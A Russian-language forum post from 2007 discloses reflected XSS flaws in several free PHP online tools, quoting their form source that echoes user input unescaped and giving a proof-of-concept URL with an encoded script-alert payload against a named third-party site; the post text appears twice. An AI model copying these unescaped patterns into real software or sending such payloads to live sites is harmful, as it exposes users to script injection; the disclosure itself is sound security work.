BlackCats
26.09.2007, 15:47
итак, это online tools используются на многих сайтах, в т.ч. секьюрити тематики, что делает эти сайты уязвимыми к xss атаке.
все данные тулзы вы можете найти на сайте автора:
http://www.puremango.co.uk/cm_online_tools_76.php
xss присутствует в online tools:
Vigenere Cipher:
xss в поле KEY
сорс данного поля:
<form action="<?=$_SERVER['PHP_SELF']?>" method="post">
Key: <input type="text" name="key" value="<?=$_POST['key']?>">
</form>
ROT-13
xss в единственном поле: Enter text to rot13:
сорцов не предоставлено.
IP2Country
xss в единственном поле: IP:
сорс поля:
<form action="<?=$_SERVER['PHP_SELF']?>" method="get">
IP: <input type="text" name="ip" value="<?=$ip?>"> <input type="submit" value="Find Country">
</form>
Domain2Country
xss в единственном поле DOMAIN
сорцов нету.
Hash Calculator
xss в единственном поле.
сорс данного поля:
<form action="<?=$_SERVER['PHP_SELF']?>" method="GET">
<input type="text" name="plaintext" value="<?=$_REQUEST['plaintext']?>"> <input type="submit" value="Generate Hashes">
</form>
в доказательство что эти скрипты реально используются, вот:
скрипт Hash Calculator на хак портале с xss.
http://webtools.xakepok.org/tools/hashcalc.php?plaintext=%22%3E%3Cscript%3Ealert%289 9%29%3C%2Fscript%3E
прошу не пинать.. о5же поделился, тем что нашёл.. никаких понтов... если у меня ошибка - укажите, а не ругайтесь, готов выслушать конструктивную критику.
все данные тулзы вы можете найти на сайте автора:
http://www.puremango.co.uk/cm_online_tools_76.php
xss присутствует в online tools:
Vigenere Cipher:
xss в поле KEY
сорс данного поля:
<form action="<?=$_SERVER['PHP_SELF']?>" method="post">
Key: <input type="text" name="key" value="<?=$_POST['key']?>">
</form>
ROT-13
xss в единственном поле: Enter text to rot13:
сорцов не предоставлено.
IP2Country
xss в единственном поле: IP:
сорс поля:
<form action="<?=$_SERVER['PHP_SELF']?>" method="get">
IP: <input type="text" name="ip" value="<?=$ip?>"> <input type="submit" value="Find Country">
</form>
Domain2Country
xss в единственном поле DOMAIN
сорцов нету.
Hash Calculator
xss в единственном поле.
сорс данного поля:
<form action="<?=$_SERVER['PHP_SELF']?>" method="GET">
<input type="text" name="plaintext" value="<?=$_REQUEST['plaintext']?>"> <input type="submit" value="Generate Hashes">
</form>
в доказательство что эти скрипты реально используются, вот:
скрипт Hash Calculator на хак портале с xss.
http://webtools.xakepok.org/tools/hashcalc.php?plaintext=%22%3E%3Cscript%3Ealert%289 9%29%3C%2Fscript%3E
прошу не пинать.. о5же поделился, тем что нашёл.. никаких понтов... если у меня ошибка - укажите, а не ругайтесь, готов выслушать конструктивную критику.